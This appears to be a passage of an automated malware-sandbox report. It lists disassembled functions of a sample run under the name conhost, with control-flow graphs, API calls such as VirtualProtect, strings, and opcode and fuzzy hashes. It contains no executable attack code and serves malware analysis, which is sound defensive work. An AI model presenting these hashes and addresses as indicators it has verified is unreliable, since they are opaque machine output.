                                                                • Associated: 00000023.00000002.2735557859.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000023.00000002.2735583788.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_35_2_140000000_conhost.jbxd
                                                                Similarity
                                                                • API ID: CriticalSection$DeleteEnterErrorLastLeaveValue
                                                                • String ID:
                                                                • API String ID: 926137887-0
                                                                • Opcode ID: 23b68bb42b0f82039d4d5f8cf07ce6922b44f5be1f238decd1318aa66a56883f
                                                                • Instruction ID: 9033c5f26b2ab15fd698305dcd7e0a279ae8f825f4298b08d7f12cd91aaca946
                                                                • Opcode Fuzzy Hash: 23b68bb42b0f82039d4d5f8cf07ce6922b44f5be1f238decd1318aa66a56883f
                                                                • Instruction Fuzzy Hash: 6621E0B1715A0292FA5BEB53F9483E923A0B76CBD0F444021FB1E576B4DB7A8986C300
                                                                Function 0000000140001880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138memoryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 474 140001880-14000189c 475 1400018a2-1400018f9 call 140002420 call 140002660 474->475 476 140001a0f-140001a1f 474->476 475->476 481 1400018ff-140001910 475->481 482 140001912-14000191c 481->482 483 14000193e-140001941 481->483 484 14000194d-140001954 482->484 485 14000191e-140001929 482->485 483->484 486 140001943-140001947 483->486 489 140001956-140001961 484->489 490 14000199e-1400019a6 484->490 485->484 487 14000192b-14000193a 485->487 486->484 488 140001a20-140001a26 486->488 487->483 492 140001b87-140001b98 call 140001d40 488->492 493 140001a2c-140001a37 488->493 494 140001970-14000199c call 140001ba0 489->494 490->476 491 1400019a8-1400019c1 490->491 495 1400019df-1400019e7 491->495 493->490 496 140001a3d-140001a5f 493->496 494->490 499 1400019e9-140001a0d VirtualProtect 495->499 500 1400019d0-1400019dd 495->500 501 140001a7d-140001a97 496->501 499->500 500->476 500->495 504 140001b74-140001b82 call 140001d40 501->504 505 140001a9d-140001afa 501->505 504->492 511 140001b22-140001b26 505->511 512 140001afc-140001b0e 505->512 515 140001b2c-140001b30 511->515 516 140001a70-140001a77 511->516 513 140001b5c-140001b6c 512->513 514 140001b10-140001b20 512->514 513->504 518 140001b6f call 140001d40 513->518 514->511 514->513 515->516 517 140001b36-140001b57 call 140001ba0 515->517 516->490 516->501 517->513 518->504
                                                                APIs
                                                                • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000023.00000002.2735499054.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                • Associated: 00000023.00000002.2735474655.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000023.00000002.2735535180.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000023.00000002.2735557859.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000023.00000002.2735583788.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_35_2_140000000_conhost.jbxd
                                                                Similarity
                                                                • API ID: ProtectVirtual
                                                                • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                • API String ID: 544645111-395989641
                                                                • Opcode ID: a6faf70e8b190511a78e30de1eab31b3fdd89b936d163022cdfacdbb5805c305
                                                                • Instruction ID: bed1886f8e7b3562c786f91e2c2504e2a336d35a61311b426e06807153cec951
                                                                • Opcode Fuzzy Hash: a6faf70e8b190511a78e30de1eab31b3fdd89b936d163022cdfacdbb5805c305
                                                                • Instruction Fuzzy Hash: 415114B6B11544DAEB12CF67F840BE827A1A759BE8F548212FB1D077B4DB38C986C700
                                                                Function 0000000140001800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 522 140001800-140001810 523 140001812-140001822 522->523 524 140001824 522->524 525 14000182b-140001867 call 140002290 fprintf 523->525 524->525
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000023.00000002.2735499054.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                • Associated: 00000023.00000002.2735474655.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000023.00000002.2735535180.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000023.00000002.2735557859.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000023.00000002.2735583788.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_35_2_140000000_conhost.jbxd
                                                                Similarity
                                                                • API ID: fprintf
                                                                • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                • API String ID: 383729395-3474627141
                                                                • Opcode ID: 06706ce423c9832590b29c5c53e3169b3bae122df3cd879a1f71e2df78fcb1e5
                                                                • Instruction ID: aea915e8a655bba8c591452d7e1c454b8f05ed4898291b50efe42234b691c12b
                                                                • Opcode Fuzzy Hash: 06706ce423c9832590b29c5c53e3169b3bae122df3cd879a1f71e2df78fcb1e5
                                                                • Instruction Fuzzy Hash: DCF0F671A04A8482E212EF2AB9413ED6360E75D3C1F50D211FF4D532A1DF3CD182C310
                                                                Function 000000014000219E Relevance: 5.0, APIs: 4, Instructions: 34COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 528 14000219e-1400021a5 529 140002272-140002280 528->529 530 1400021ab-1400021c2 EnterCriticalSection 528->530 531 140002265-14000226c LeaveCriticalSection 530->531 532 1400021c8-1400021d6 530->532 531->529 533 1400021e9-1400021f5 TlsGetValue GetLastError 532->533 534 1400021f7-1400021fa 533->534 535 1400021e0-1400021e7 533->535 534->535 536 1400021fc-140002209 534->536 535->531 535->533 536->535
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000023.00000002.2735499054.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                • Associated: 00000023.00000002.2735474655.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000023.00000002.2735535180.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000023.00000002.2735557859.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000023.00000002.2735583788.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_35_2_140000000_conhost.jbxd
                                                                Similarity
                                                                • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                • String ID:
                                                                • API String ID: 682475483-0
                                                                • Opcode ID: ef714723185b3a8d2aed80037f9450dbdc245cd35eb766ee46406a0163f8cc51
                                                                • Instruction ID: 8e08899b71d5d6c295770fc95a4fa8b22c720a8a39741bac27afb53efd3d8dea
                                                                • Opcode Fuzzy Hash: ef714723185b3a8d2aed80037f9450dbdc245cd35eb766ee46406a0163f8cc51
                                                                • Instruction Fuzzy Hash: C201B2B5705A0192FA5BDB53FE083E86360B76CBD1F454061EF0957AB4DF79C996C200